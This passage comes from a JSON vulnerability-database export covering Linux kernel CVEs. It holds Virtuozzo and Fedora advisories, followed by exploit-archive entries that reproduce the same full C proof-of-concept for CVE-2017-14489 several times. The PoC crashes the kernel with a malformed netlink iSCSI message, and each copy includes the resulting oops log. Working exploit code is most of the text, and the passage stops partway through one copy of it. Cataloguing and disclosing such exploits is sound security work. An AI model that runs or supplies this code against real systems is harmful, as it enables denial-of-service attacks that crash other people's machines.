Due to the nature of the stack protection feature, code execution cannot be fully ruled out, although we believe it is unlikely.\n\n**Vulnerability id:** CVE-2017-14489\nThe iscsi_if_rx function in drivers/scsi/scsi_transport_iscsi.c in the Linux kernel through 4.13.2 allows local users to cause a denial of service (panic) by leveraging incorrect length validation.\n\n", "edition": 2, "modified": "2017-09-26T00:00:00", "published": "2017-09-26T00:00:00", "id": "VZA-2017-085", "href": "https://help.virtuozzo.com/customer/portal/articles/2880187", "title": "Important kernel security update: CVE-2017-1000251 and other; new kernel 2.6.32-042stab125.1, Virtuozzo 6.0 Update 12 Hotfix 15 (6.0.12-3684)", "type": "virtuozzo", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-06-04T16:40:18", "bulletinFamily": "unix", "cvelist": ["CVE-2017-14489", "CVE-2017-1000251"], "description": "This update provides the new kernel 2.6.32-042stab125.1 for Virtuozzo Containers for Linux 4.7, Server Bare Metal 5.0 based on the Red Hat Enterprise Linux 6.9 kernel 2.6.32-696.10.2.el6. This update inherits a security fix from the original RHEL kernel and provides internal security fixes.\n**Vulnerability id:** PSBM-72416\nKernel crash due to missing error handling for negatively instantiated keys.\n\n**Vulnerability id:** CVE-2017-1000251\nA stack buffer overflow flaw was found in the way the Bluetooth subsystem of the Linux kernel processed pending L2CAP configuration responses from a client. On systems with the stack protection feature enabled in the kernel an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to crash the system. 
Due to the nature of the stack protection feature, code execution cannot be fully ruled out, although we believe it is unlikely.\n\n**Vulnerability id:** CVE-2017-14489\nThe iscsi_if_rx function in drivers/scsi/scsi_transport_iscsi.c in the Linux kernel through 4.13.2 allows local users to cause a denial of service (panic) by leveraging incorrect length validation.\n\n", "edition": 2, "modified": "2017-09-26T00:00:00", "published": "2017-09-26T00:00:00", "id": "VZA-2017-084", "href": "https://help.virtuozzo.com/customer/portal/articles/2880186", "title": "Important kernel security update: CVE-2017-1000251 and other; new kernel 2.6.32-042stab125.1 for Virtuozzo Containers for Linux 4.7, Server Bare Metal 5.0", "type": "virtuozzo", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-06-04T16:41:01", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000251", "CVE-2017-1000253", "CVE-2017-12154"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security fixes. The patch applies to Virtuozzo kernels 3.10.0-327.18.2.vz7.15.2 (Virtuozzo 7.0.0), 3.10.0-327.36.1.vz7.18.7 (Virtuozzo 7.0.1), 3.10.0-327.36.1.vz7.20.18 (Virtuozzo 7.0.3), 3.10.0-514.16.1.vz7.30.10 (Virtuozzo 7.0.4), 3.10.0-514.16.1.vz7.30.15 (Virtuozzo 7.0.4 HF3), and 3.10.0-514.26.1.vz7.33.22 (Virtuozzo 7.0.5).\n**Vulnerability id:** CVE-2017-1000253\nA flaw was found in the way the Linux kernel loaded ELF executables. Provided that an application was built as Position Independent Executable (PIE), the loader could allow part of that application's data segment to map over the memory area reserved for its stack, potentially resulting in memory corruption. 
An unprivileged local user with access to SUID (or otherwise privileged) PIE binary could use this flaw to escalate their privileges on the system.\n\n**Vulnerability id:** CVE-2017-1000251\nA stack buffer overflow flaw was found in the way the Bluetooth subsystem of the Linux kernel processed pending L2CAP configuration responses from a client. On systems with the stack protection feature enabled in the kernel an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to crash the system. Due to the nature of the stack protection feature, code execution cannot be fully ruled out, although we believe it is unlikely.\n\n**Vulnerability id:** CVE-2017-12154\nThe prepare_vmcs02 function in arch/x86/kvm/vmx.c in the Linux kernel through 4.13.3 does not ensure that the 'CR8-load exiting' and 'CR8-store exiting' L0 vmcs02 controls exist in cases where L1 omits the 'use TPR shadow' vmcs12 control, which allows KVM L2 guest OS users to obtain read and write access to the hardware CR8 register.\n\n", "edition": 2, "modified": "2017-09-28T00:00:00", "published": "2017-09-28T00:00:00", "id": "VZA-2017-086", "href": "https://help.virtuozzo.com/customer/portal/articles/2881453", "title": "Kernel security update: CVE-2017-1000253; Virtuozzo ReadyKernel patch 32.1 for Virtuozzo 7.0.x", "type": "virtuozzo", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000251", "CVE-2017-12153", "CVE-2017-12154"], "description": "The kernel meta package ", "modified": "2017-09-17T22:52:47", "published": "2017-09-17T22:52:47", "id": "FEDORA:9526C6075D89", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: kernel-4.12.13-300.fc26", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000251", "CVE-2017-12153", "CVE-2017-12154"], 
"description": "The kernel meta package ", "modified": "2017-09-22T05:23:22", "published": "2017-09-22T05:23:22", "id": "FEDORA:8CACD6083B5B", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: kernel-4.12.13-200.fc25", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-02-09T03:07:12", "description": "Exploit for linux platform in category dos / poc", "edition": 1, "published": "2017-10-02T00:00:00", "title": "Linux Kernel < 4.14.rc3 - Local Denial of Service Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-14489"], "modified": "2017-10-02T00:00:00", "href": "https://0day.today/exploit/description/28714", "id": "1337DAY-ID-28714", "sourceData": "# Exploit Title: Linux Kernel<4.14.rc3 Local Denial of Service\r\n# Exploit Author: Wang Chenyu (Nanyang Technological University)\r\n# Version:Linux kernel 4-14-rc1\r\n# Tested on:Ubuntu 16.04 desktop amd64\r\n# CVE : CVE-2017-14489\r\n# CVE description: This CVE is assigned to Wang Chunyu (Red Hat) and\r\ndiscovered by Syzkaller. 
Provided for legal security research and testing\r\npurposes ONLY.\r\nIn this POC, skb_shinfo(SKB)->nr_frags was overwritten by ev->iferror = err\r\n(0xff) in the condition where nlh->nlmsg_len==0x10 and skb->len >\r\nnlh->nlmsg_len.\r\n\r\n\r\nPOC:\r\n#include <sys/socket.h>\r\n#include <linux/netlink.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n\r\n#define NETLINK_USER 31\r\n\r\n#define MAX_PAYLOAD 1024 /* maximum payload size*/\r\nstruct sockaddr_nl src_addr, dest_addr;\r\nstruct nlmsghdr *nlh = NULL;\r\nstruct iovec iov;\r\nint sock_fd;\r\nstruct msghdr msg;\r\n\r\nint main()\r\n{\r\nsock_fd=socket(PF_NETLINK, SOCK_RAW, NETLINK_ISCSI);\r\nif(sock_fd<0)\r\nreturn -1;\r\n\r\nmemset(&src_addr, 0, sizeof(src_addr));\r\nsrc_addr.nl_family = AF_NETLINK;\r\nsrc_addr.nl_pid = getpid(); /* self pid */\r\n\r\nbind(sock_fd, (struct sockaddr*)&src_addr, sizeof(src_addr));\r\n\r\nmemset(&dest_addr, 0, sizeof(dest_addr));\r\nmemset(&dest_addr, 0, sizeof(dest_addr));\r\ndest_addr.nl_family = AF_NETLINK;\r\ndest_addr.nl_pid = 0; /* For Linux Kernel */\r\ndest_addr.nl_groups = 0; /* unicast */\r\n\r\nnlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(MAX_PAYLOAD));\r\nmemset(nlh, 0, NLMSG_SPACE(MAX_PAYLOAD));\r\nnlh->nlmsg_len = 0xac;\r\nnlh->nlmsg_pid = getpid();\r\nnlh->nlmsg_flags = 0;\r\n\r\nstrcpy(NLMSG_DATA(nlh), \"ABCDEFGHabcdefghABCDEFGHabcdef\r\nghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHab\r\ncdefghAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCDDDDDDDDDDDD\\x10\");\r\n\r\niov.iov_base = (void *)nlh;\r\niov.iov_len = 0xc0;\r\nmsg.msg_name = (void *)&dest_addr;\r\nmsg.msg_namelen = sizeof(dest_addr);\r\nmsg.msg_iov = &iov;\r\nmsg.msg_iovlen = 1;\r\n\r\nprintf(\"Sending message to kernel\\n\");\r\nsendmsg(sock_fd,&msg,0);\r\nprintf(\"Waiting for message from kernel\\n\");\r\n\r\n/* Read message from kernel */\r\nrecvmsg(sock_fd, &msg, 0);\r\nprintf(\"Received message payload: %s\\n\", (char 
*)NLMSG_DATA(nlh));\r\nclose(sock_fd);\r\n}\r\n\r\n\r\nCrash info:\r\n[ 17.880629] BUG: unable to handle kernel NULL pointer dereference at\r\n0000000000000028\r\n[ 17.881586] IP: skb_release_data+0x77/0x110\r\n[ 17.882093] PGD 7b02a067 P4D 7b02a067 PUD 7b02b067 PMD 0\r\n[ 17.882743] Oops: 0002 [#1] SMP\r\n[ 17.883123] Modules linked in:\r\n[ 17.883493] CPU: 1 PID: 2687 Comm: test02 Not tainted 4.14.0-rc1+ #1\r\n[ 17.884251] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS\r\nUbuntu-1.8.2-1ubuntu1 04/01/2014\r\n[ 17.885350] task: ffff88007c5a1900 task.stack: ffffc90000e10000\r\n[ 17.886058] RIP: 0010:skb_release_data+0x77/0x110\r\n[ 17.886590] RSP: 0018:ffffc90000e13c08 EFLAGS: 00010202\r\n[ 17.887213] RAX: 000000000000000d RBX: ffff88007bd50300 RCX:\r\nffffffff820f96a0\r\n[ 17.888059] RDX: 000000000000000c RSI: 0000000000000010 RDI:\r\n000000000000000c\r\n[ 17.888893] RBP: ffffc90000e13c20 R08: ffffffff820f9860 R09:\r\nffffc90000e13ad8\r\n[ 17.889712] R10: ffffea0001ef5400 R11: ffff88007d001700 R12:\r\n0000000000000000\r\n[ 17.890349] R13: ffff88007be710c0 R14: 00000000000000c0 R15:\r\n0000000000000000\r\n[ 17.890977] FS: 00007f7614d4c700(0000) GS:ffff88007fd00000(0000)\r\nknlGS:0000000000000000\r\n[ 17.891592] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\r\n[ 17.892054] CR2: 0000000000000028 CR3: 000000007b022000 CR4:\r\n00000000000006e0\r\n[ 17.892629] Call Trace:\r\n[ 17.892833] skb_release_all+0x1f/0x30\r\n[ 17.893140] consume_skb+0x27/0x90\r\n[ 17.893418] netlink_unicast+0x16a/0x210\r\n[ 17.893735] netlink_sendmsg+0x2a3/0x390\r\n[ 17.894050] sock_sendmsg+0x33/0x40\r\n[ 17.894336] ___sys_sendmsg+0x29e/0x2b0\r\n[ 17.894650] ? __wake_up_common_lock+0x7a/0x90\r\n[ 17.895009] ? __wake_up+0xe/0x10\r\n[ 17.895280] ? tty_write_unlock+0x2c/0x30\r\n[ 17.895606] ? tty_ldisc_deref+0x11/0x20\r\n[ 17.895925] ? n_tty_open+0xd0/0xd0\r\n[ 17.896211] ? __vfs_write+0x23/0x130\r\n[ 17.896512] __sys_sendmsg+0x40/0x70\r\n[ 17.896805] ? 
__sys_sendmsg+0x40/0x70\r\n[ 17.897133] SyS_sendmsg+0xd/0x20\r\n[ 17.897408] entry_SYSCALL_64_fastpath+0x13/0x94\r\n[ 17.897783] RIP: 0033:0x7f7614886320\r\n[ 17.898186] RSP: 002b:00007fff6f17f9c8 EFLAGS: 00000246 ORIG_RAX:\r\n000000000000002e\r\n[ 17.898793] RAX: ffffffffffffffda RBX: 00007f7614b2e7a0 RCX:\r\n00007f7614886320\r\n[ 17.899368] RDX: 0000000000000000 RSI: 0000000000600fc0 RDI:\r\n0000000000000003\r\n[ 17.899943] RBP: 0000000000000053 R08: 00000000ffffffff R09:\r\n0000000000000000\r\n[ 17.900521] R10: 0000000000000000 R11: 0000000000000246 R12:\r\n0000000000400b9e\r\n[ 17.901095] R13: 00007f7614d50000 R14: 0000000000000019 R15:\r\n0000000000400b9e\r\n[ 17.901672] Code: 45 31 e4 41 80 7d 02 00 48 89 fb 74 32 49 63 c4 48 83\r\nc0 03 48 c1 e0 04 49 8b 7c 05 00 48 8b 47 20 48 8d 50 ff a8 01 48 0f 45 fa\r\n<f0> ff 4f 1c 74 7a 41 0f b6 45 02 41 83 c4 01 44 39 e0 7f ce 49\r\n[ 17.903190] RIP: skb_release_data+0x77/0x110 RSP: ffffc90000e13c08\r\n[ 17.903689] CR2: 0000000000000028\r\n[ 17.903980] ---[ end trace 2f1926fbc1d32679 ]---\r\n\r\n\r\nReference:\r\n[1] https://patchwork.kernel.org/patch/9923803/\r\n[2] https://github.com/google/syzkaller\n\n# 0day.today [2018-02-09] #", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/28714"}], "exploitdb": [{"lastseen": "2017-10-02T09:53:33", "description": "Linux Kernel < 4.14.rc3 - Local Denial of Service. CVE-2017-14489. 
Dos exploit for Linux platform", "published": "2017-10-02T00:00:00", "type": "exploitdb", "title": "Linux Kernel < 4.14.rc3 - Local Denial of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-14489"], "modified": "2017-10-02T00:00:00", "id": "EDB-ID:42932", "href": "https://www.exploit-db.com/exploits/42932/", "sourceData": "# Exploit Title: Linux Kernel<4.14.rc3 Local Denial of Service\r\n# Date: 2017-Oct-02\r\n# Exploit Author: Wang Chenyu (Nanyang Technological University)\r\n# Version:Linux kernel 4-14-rc1\r\n# Tested on:Ubuntu 16.04 desktop amd64\r\n# CVE : CVE-2017-14489\r\n# CVE description: This CVE is assigned to Wang Chunyu (Red Hat) and\r\ndiscovered by Syzkaller. Provided for legal security research and testing\r\npurposes ONLY.\r\nIn this POC, skb_shinfo(SKB)->nr_frags was overwritten by ev->iferror = err\r\n(0xff) in the condition where nlh->nlmsg_len==0x10 and skb->len >\r\nnlh->nlmsg_len.\r\n\r\n\r\nPOC:\r\n#include <sys/socket.h>\r\n#include <linux/netlink.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n\r\n#define NETLINK_USER 31\r\n\r\n#define MAX_PAYLOAD 1024 /* maximum payload size*/\r\nstruct sockaddr_nl src_addr, dest_addr;\r\nstruct nlmsghdr *nlh = NULL;\r\nstruct iovec iov;\r\nint sock_fd;\r\nstruct msghdr msg;\r\n\r\nint main()\r\n{\r\nsock_fd=socket(PF_NETLINK, SOCK_RAW, NETLINK_ISCSI);\r\nif(sock_fd<0)\r\nreturn -1;\r\n\r\nmemset(&src_addr, 0, sizeof(src_addr));\r\nsrc_addr.nl_family = AF_NETLINK;\r\nsrc_addr.nl_pid = getpid(); /* self pid */\r\n\r\nbind(sock_fd, (struct sockaddr*)&src_addr, sizeof(src_addr));\r\n\r\nmemset(&dest_addr, 0, sizeof(dest_addr));\r\nmemset(&dest_addr, 0, sizeof(dest_addr));\r\ndest_addr.nl_family = AF_NETLINK;\r\ndest_addr.nl_pid = 0; /* For Linux Kernel */\r\ndest_addr.nl_groups = 0; /* unicast */\r\n\r\nnlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(MAX_PAYLOAD));\r\nmemset(nlh, 0, NLMSG_SPACE(MAX_PAYLOAD));\r\nnlh->nlmsg_len = 0xac;\r\nnlh->nlmsg_pid = 
getpid();\r\nnlh->nlmsg_flags = 0;\r\n\r\nstrcpy(NLMSG_DATA(nlh), \"ABCDEFGHabcdefghABCDEFGHabcdef\r\nghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHab\r\ncdefghAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCDDDDDDDDDDDD\\x10\");\r\n\r\niov.iov_base = (void *)nlh;\r\niov.iov_len = 0xc0;\r\nmsg.msg_name = (void *)&dest_addr;\r\nmsg.msg_namelen = sizeof(dest_addr);\r\nmsg.msg_iov = &iov;\r\nmsg.msg_iovlen = 1;\r\n\r\nprintf(\"Sending message to kernel\\n\");\r\nsendmsg(sock_fd,&msg,0);\r\nprintf(\"Waiting for message from kernel\\n\");\r\n\r\n/* Read message from kernel */\r\nrecvmsg(sock_fd, &msg, 0);\r\nprintf(\"Received message payload: %s\\n\", (char *)NLMSG_DATA(nlh));\r\nclose(sock_fd);\r\n}\r\n\r\n\r\nCrash info:\r\n[ 17.880629] BUG: unable to handle kernel NULL pointer dereference at\r\n0000000000000028\r\n[ 17.881586] IP: skb_release_data+0x77/0x110\r\n[ 17.882093] PGD 7b02a067 P4D 7b02a067 PUD 7b02b067 PMD 0\r\n[ 17.882743] Oops: 0002 [#1] SMP\r\n[ 17.883123] Modules linked in:\r\n[ 17.883493] CPU: 1 PID: 2687 Comm: test02 Not tainted 4.14.0-rc1+ #1\r\n[ 17.884251] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS\r\nUbuntu-1.8.2-1ubuntu1 04/01/2014\r\n[ 17.885350] task: ffff88007c5a1900 task.stack: ffffc90000e10000\r\n[ 17.886058] RIP: 0010:skb_release_data+0x77/0x110\r\n[ 17.886590] RSP: 0018:ffffc90000e13c08 EFLAGS: 00010202\r\n[ 17.887213] RAX: 000000000000000d RBX: ffff88007bd50300 RCX:\r\nffffffff820f96a0\r\n[ 17.888059] RDX: 000000000000000c RSI: 0000000000000010 RDI:\r\n000000000000000c\r\n[ 17.888893] RBP: ffffc90000e13c20 R08: ffffffff820f9860 R09:\r\nffffc90000e13ad8\r\n[ 17.889712] R10: ffffea0001ef5400 R11: ffff88007d001700 R12:\r\n0000000000000000\r\n[ 17.890349] R13: ffff88007be710c0 R14: 00000000000000c0 R15:\r\n0000000000000000\r\n[ 17.890977] FS: 00007f7614d4c700(0000) GS:ffff88007fd00000(0000)\r\nknlGS:0000000000000000\r\n[ 17.891592] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\r\n[ 17.892054] CR2: 
0000000000000028 CR3: 000000007b022000 CR4:\r\n00000000000006e0\r\n[ 17.892629] Call Trace:\r\n[ 17.892833] skb_release_all+0x1f/0x30\r\n[ 17.893140] consume_skb+0x27/0x90\r\n[ 17.893418] netlink_unicast+0x16a/0x210\r\n[ 17.893735] netlink_sendmsg+0x2a3/0x390\r\n[ 17.894050] sock_sendmsg+0x33/0x40\r\n[ 17.894336] ___sys_sendmsg+0x29e/0x2b0\r\n[ 17.894650] ? __wake_up_common_lock+0x7a/0x90\r\n[ 17.895009] ? __wake_up+0xe/0x10\r\n[ 17.895280] ? tty_write_unlock+0x2c/0x30\r\n[ 17.895606] ? tty_ldisc_deref+0x11/0x20\r\n[ 17.895925] ? n_tty_open+0xd0/0xd0\r\n[ 17.896211] ? __vfs_write+0x23/0x130\r\n[ 17.896512] __sys_sendmsg+0x40/0x70\r\n[ 17.896805] ? __sys_sendmsg+0x40/0x70\r\n[ 17.897133] SyS_sendmsg+0xd/0x20\r\n[ 17.897408] entry_SYSCALL_64_fastpath+0x13/0x94\r\n[ 17.897783] RIP: 0033:0x7f7614886320\r\n[ 17.898186] RSP: 002b:00007fff6f17f9c8 EFLAGS: 00000246 ORIG_RAX:\r\n000000000000002e\r\n[ 17.898793] RAX: ffffffffffffffda RBX: 00007f7614b2e7a0 RCX:\r\n00007f7614886320\r\n[ 17.899368] RDX: 0000000000000000 RSI: 0000000000600fc0 RDI:\r\n0000000000000003\r\n[ 17.899943] RBP: 0000000000000053 R08: 00000000ffffffff R09:\r\n0000000000000000\r\n[ 17.900521] R10: 0000000000000000 R11: 0000000000000246 R12:\r\n0000000000400b9e\r\n[ 17.901095] R13: 00007f7614d50000 R14: 0000000000000019 R15:\r\n0000000000400b9e\r\n[ 17.901672] Code: 45 31 e4 41 80 7d 02 00 48 89 fb 74 32 49 63 c4 48 83\r\nc0 03 48 c1 e0 04 49 8b 7c 05 00 48 8b 47 20 48 8d 50 ff a8 01 48 0f 45 fa\r\n<f0> ff 4f 1c 74 7a 41 0f b6 45 02 41 83 c4 01 44 39 e0 7f ce 49\r\n[ 17.903190] RIP: skb_release_data+0x77/0x110 RSP: ffffc90000e13c08\r\n[ 17.903689] CR2: 0000000000000028\r\n[ 17.903980] ---[ end trace 2f1926fbc1d32679 ]---\r\n\r\n\r\nReference:\r\n[1] https://patchwork.kernel.org/patch/9923803/\r\n[2] https://github.com/google/syzkaller\r\n", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/42932/"}], "exploitpack": 
[{"lastseen": "2020-04-01T19:04:26", "description": "\nLinux Kernel 4.14.rc3 - Local Denial of Service", "edition": 1, "published": "2017-10-02T00:00:00", "title": "Linux Kernel 4.14.rc3 - Local Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-14489"], "modified": "2017-10-02T00:00:00", "id": "EXPLOITPACK:07DF51A414A141989EF9F5989CC324A1", "href": "", "sourceData": "/*\n# Exploit Title: Linux Kernel<4.14.rc3 Local Denial of Service\n# Date: 2017-Oct-02\n# Exploit Author: Wang Chenyu (Nanyang Technological University)\n# Version:Linux kernel 4-14-rc1\n# Tested on:Ubuntu 16.04 desktop amd64\n# CVE : CVE-2017-14489\n# CVE description: This CVE is assigned to Wang Chunyu (Red Hat) and\ndiscovered by Syzkaller. Provided for legal security research and testing\npurposes ONLY.\nIn this POC, skb_shinfo(SKB)->nr_frags was overwritten by ev->iferror = err\n(0xff) in the condition where nlh->nlmsg_len==0x10 and skb->len >\nnlh->nlmsg_len.\n\n\nPOC:\n*/\n\n#include <sys/socket.h>\n#include <linux/netlink.h>\n#include <stdlib.h>\n#include <string.h>\n#include <stdio.h>\n\n#define NETLINK_USER 31\n\n#define MAX_PAYLOAD 1024 /* maximum payload size*/\nstruct sockaddr_nl src_addr, dest_addr;\nstruct nlmsghdr *nlh = NULL;\nstruct iovec iov;\nint sock_fd;\nstruct msghdr msg;\n\nint main()\n{\nsock_fd=socket(PF_NETLINK, SOCK_RAW, NETLINK_ISCSI);\nif(sock_fd<0)\nreturn -1;\n\nmemset(&src_addr, 0, sizeof(src_addr));\nsrc_addr.nl_family = AF_NETLINK;\nsrc_addr.nl_pid = getpid(); /* self pid */\n\nbind(sock_fd, (struct sockaddr*)&src_addr, sizeof(src_addr));\n\nmemset(&dest_addr, 0, sizeof(dest_addr));\nmemset(&dest_addr, 0, sizeof(dest_addr));\ndest_addr.nl_family = AF_NETLINK;\ndest_addr.nl_pid = 0; /* For Linux Kernel */\ndest_addr.nl_groups = 0; /* unicast */\n\nnlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(MAX_PAYLOAD));\nmemset(nlh, 0, NLMSG_SPACE(MAX_PAYLOAD));\nnlh->nlmsg_len = 0xac;\nnlh->nlmsg_pid = getpid();\nnlh->nlmsg_flags = 
0;\n\nstrcpy(NLMSG_DATA(nlh), \"ABCDEFGHabcdefghABCDEFGHabcdef\nghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHab\ncdefghAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCDDDDDDDDDDDD\\x10\");\n\niov.iov_base = (void *)nlh;\niov.iov_len = 0xc0;\nmsg.msg_name = (void *)&dest_addr;\nmsg.msg_namelen = sizeof(dest_addr);\nmsg.msg_iov = &iov;\nmsg.msg_iovlen = 1;\n\nprintf(\"Sending message to kernel\\n\");\nsendmsg(sock_fd,&msg,0);\nprintf(\"Waiting for message from kernel\\n\");\n\n/* Read message from kernel */\nrecvmsg(sock_fd, &msg, 0);\nprintf(\"Received message payload: %s\\n\", (char *)NLMSG_DATA(nlh));\nclose(sock_fd);\n}\n\n\nCrash info:\n[ 17.880629] BUG: unable to handle kernel NULL pointer dereference at\n0000000000000028\n[ 17.881586] IP: skb_release_data+0x77/0x110\n[ 17.882093] PGD 7b02a067 P4D 7b02a067 PUD 7b02b067 PMD 0\n[ 17.882743] Oops: 0002 [#1] SMP\n[ 17.883123] Modules linked in:\n[ 17.883493] CPU: 1 PID: 2687 Comm: test02 Not tainted 4.14.0-rc1+ #1\n[ 17.884251] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS\nUbuntu-1.8.2-1ubuntu1 04/01/2014\n[ 17.885350] task: ffff88007c5a1900 task.stack: ffffc90000e10000\n[ 17.886058] RIP: 0010:skb_release_data+0x77/0x110\n[ 17.886590] RSP: 0018:ffffc90000e13c08 EFLAGS: 00010202\n[ 17.887213] RAX: 000000000000000d RBX: ffff88007bd50300 RCX:\nffffffff820f96a0\n[ 17.888059] RDX: 000000000000000c RSI: 0000000000000010 RDI:\n000000000000000c\n[ 17.888893] RBP: ffffc90000e13c20 R08: ffffffff820f9860 R09:\nffffc90000e13ad8\n[ 17.889712] R10: ffffea0001ef5400 R11: ffff88007d001700 R12:\n0000000000000000\n[ 17.890349] R13: ffff88007be710c0 R14: 00000000000000c0 R15:\n0000000000000000\n[ 17.890977] FS: 00007f7614d4c700(0000) GS:ffff88007fd00000(0000)\nknlGS:0000000000000000\n[ 17.891592] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 17.892054] CR2: 0000000000000028 CR3: 000000007b022000 CR4:\n00000000000006e0\n[ 17.892629] Call Trace:\n[ 17.892833] skb_release_all+0x1f/0x30\n[ 17.893140] 
consume_skb+0x27/0x90\n[ 17.893418] netlink_unicast+0x16a/0x210\n[ 17.893735] netlink_sendmsg+0x2a3/0x390\n[ 17.894050] sock_sendmsg+0x33/0x40\n[ 17.894336] ___sys_sendmsg+0x29e/0x2b0\n[ 17.894650] ? __wake_up_common_lock+0x7a/0x90\n[ 17.895009] ? __wake_up+0xe/0x10\n[ 17.895280] ? tty_write_unlock+0x2c/0x30\n[ 17.895606] ? tty_ldisc_deref+0x11/0x20\n[ 17.895925] ? n_tty_open+0xd0/0xd0\n[ 17.896211] ? __vfs_write+0x23/0x130\n[ 17.896512] __sys_sendmsg+0x40/0x70\n[ 17.896805] ? __sys_sendmsg+0x40/0x70\n[ 17.897133] SyS_sendmsg+0xd/0x20\n[ 17.897408] entry_SYSCALL_64_fastpath+0x13/0x94\n[ 17.897783] RIP: 0033:0x7f7614886320\n[ 17.898186] RSP: 002b:00007fff6f17f9c8 EFLAGS: 00000246 ORIG_RAX:\n000000000000002e\n[ 17.898793] RAX: ffffffffffffffda RBX: 00007f7614b2e7a0 RCX:\n00007f7614886320\n[ 17.899368] RDX: 0000000000000000 RSI: 0000000000600fc0 RDI:\n0000000000000003\n[ 17.899943] RBP: 0000000000000053 R08: 00000000ffffffff R09:\n0000000000000000\n[ 17.900521] R10: 0000000000000000 R11: 0000000000000246 R12:\n0000000000400b9e\n[ 17.901095] R13: 00007f7614d50000 R14: 0000000000000019 R15:\n0000000000400b9e\n[ 17.901672] Code: 45 31 e4 41 80 7d 02 00 48 89 fb 74 32 49 63 c4 48 83\nc0 03 48 c1 e0 04 49 8b 7c 05 00 48 8b 47 20 48 8d 50 ff a8 01 48 0f 45 fa\n<f0> ff 4f 1c 74 7a 41 0f b6 45 02 41 83 c4 01 44 39 e0 7f ce 49\n[ 17.903190] RIP: skb_release_data+0x77/0x110 RSP: ffffc90000e13c08\n[ 17.903689] CR2: 0000000000000028\n[ 17.903980] ---[ end trace 2f1926fbc1d32679 ]---\n\n\nReference:\n[1] https://patchwork.kernel.org/patch/9923803/\n[2] https://github.com/google/syzkaller", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "packetstorm": [{"lastseen": "2017-10-03T13:59:24", "description": "", "published": "2017-10-02T00:00:00", "type": "packetstorm", "title": "Linux Kernel 4-14-rc1 Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-14489"], "modified": "2017-10-02T00:00:00", "id": "PACKETSTORM:144476", "href": 
"https://packetstormsecurity.com/files/144476/Linux-Kernel-4-14-rc1-Denial-Of-Service.html", "sourceData": "`# Exploit Title: Linux Kernel<4.14.rc3 Local Denial of Service \n# Date: 2017-Oct-02 \n# Exploit Author: Wang Chenyu (Nanyang Technological University) \n# Version:Linux kernel 4-14-rc1 \n# Tested on:Ubuntu 16.04 desktop amd64 \n# CVE : CVE-2017-14489 \n# CVE description: This CVE is assigned to Wang Chunyu (Red Hat) and \ndiscovered by Syzkaller. Provided for legal security research and testing \npurposes ONLY. \nIn this POC, skb_shinfo(SKB)->nr_frags was overwritten by ev->iferror = err \n(0xff) in the condition where nlh->nlmsg_len==0x10 and skb->len > \nnlh->nlmsg_len. \n \n \nPOC: \n#include <sys/socket.h> \n#include <linux/netlink.h> \n#include <stdlib.h> \n#include <string.h> \n#include <stdio.h> \n \n#define NETLINK_USER 31 \n \n#define MAX_PAYLOAD 1024 /* maximum payload size*/ \nstruct sockaddr_nl src_addr, dest_addr; \nstruct nlmsghdr *nlh = NULL; \nstruct iovec iov; \nint sock_fd; \nstruct msghdr msg; \n \nint main() \n{ \nsock_fd=socket(PF_NETLINK, SOCK_RAW, NETLINK_ISCSI); \nif(sock_fd<0) \nreturn -1; \n \nmemset(&src_addr, 0, sizeof(src_addr)); \nsrc_addr.nl_family = AF_NETLINK; \nsrc_addr.nl_pid = getpid(); /* self pid */ \n \nbind(sock_fd, (struct sockaddr*)&src_addr, sizeof(src_addr)); \n \nmemset(&dest_addr, 0, sizeof(dest_addr)); \nmemset(&dest_addr, 0, sizeof(dest_addr)); \ndest_addr.nl_family = AF_NETLINK; \ndest_addr.nl_pid = 0; /* For Linux Kernel */ 